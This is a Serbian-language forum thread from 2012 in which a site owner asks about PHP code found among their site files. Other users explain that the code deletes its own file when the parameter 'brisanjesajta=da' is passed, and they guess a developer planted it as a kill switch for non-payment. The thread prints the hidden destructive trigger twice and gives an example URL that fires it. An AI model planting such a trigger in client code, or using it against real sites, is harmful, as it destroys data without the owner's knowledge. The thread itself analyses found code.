Sta znaci ovaj kod?

[ s00ky @ 23.05.2012. 09:22 ] @

Pozdrav.. Slucajno sam video u sajtu ovaj kod i uplasio sam se.. -_-

Code:
<?php
            $sql = "SELECT * FROM osnovno";
               $query = mysql_query($sql) or die();
         if (isset($_GET['brisanjesajta'])) {
   $brisanje = $_GET['brisanjesajta'];
   if ($brisanje=="da") {
      unlink(__FILE__);
      }
   }
               while ($row = mysql_fetch_assoc($query))
               {
                  echo "<h1 onclick=\"location.href='../'\"; style='text-align:center;'>{$row['title']}</h1>";
               }
            ?>

Je l' moze neko da mi objasni sta tacno znaci ovaj kod i da li ga je potrebno obrisati? Ako ga je potrebno obrisati molim vas da mi objasnite kako?

[ AMD guy @ 23.05.2012. 09:26 ] @

Jel ovo vidis preko opcije view source browsera?
PHP se hendluje preko servera i ne bi trebao da vidis taj kod direktno u web stranici.

[ Predrag Supurovic @ 23.05.2012. 10:17 ] @

Zaista neobičan kod ugrađen u sajt.

Izgleda kao da je neko sebi napravio mogućnost da jednim potezom reguliše ako mu ne platite za usluge.

[ StaX_ @ 23.05.2012. 13:30 ] @

Stvarno neobičan kod kao što reče Predrag, i meni se čini da mu namera nije baš najsjajnija. I verovatno briše stranicu po stranicu prezentacije gde god postoji ovaj deo koda. Bar mi se čini da mu je to namena.

[ s00ky @ 23.05.2012. 16:58 ] @

Je l moze neko tacno da objasni sta radi ovaj kod? Kako izvrsava svoju funkciju? Gde se pokrece?
Hvala

[ Igor Gajic @ 23.05.2012. 17:04 ] @

Uredno platis developeru i gle cuda kod nestaje ;)

[ Milos911 @ 23.05.2012. 17:07 ] @

Citat:

s00ky: Je l moze neko tacno da objasni sta radi ovaj kod? Kako izvrsava svoju funkciju? Gde se pokrece?
Hvala

Pokrece se na serveru, ako ga vidis u browseru ne moze ti nista.

Code:
<?php
            $sql = "SELECT * FROM osnovno";
               $query = mysql_query($sql) or die();//uzima podatke iz baze

         if (isset($_GET['brisanjesajta'])) {
   $brisanje = $_GET['brisanjesajta'];
   if ($brisanje=="da") { //ako je otvoren link za brisanje fajla, brise neki prethodno definisan fajl
      unlink(__FILE__);
      }
   }
               while ($row = mysql_fetch_assoc($query))
               {
                  echo "<h1 onclick=\"location.href='../'\"; style='text-align:center;'>{$row['title']}</h1>";  ///ispisuje ovaj red vise puta,
    //ovo ne bi trebao da vidis u browseru ovako
               }
            ?>

Jel ovo vidis na tvom sajtu ili?

[ s00ky @ 24.05.2012. 14:43 ] @

Ne, to sam slucajno video u cpanelu kada sam pregledavao fajlove..

[ plus_minus @ 28.05.2012. 15:36 ] @

Otvorio si dakle fajl sa svog sajta u neki editor i to si dobio?

[ vatri @ 07.06.2012. 20:17 ] @

__FILE__ je magic constant koja oznacava fajl u kome je kod. ( http://php.net/manual/en/language.constants.predefined.php )

unlink(__FILE__);

znaci da se brise trenutni PHP fajl.

Ako ti neko u browser upise

http://sajt.com/strana.php?brisanjesajta=da

fajl strana.php ce biti obrisana...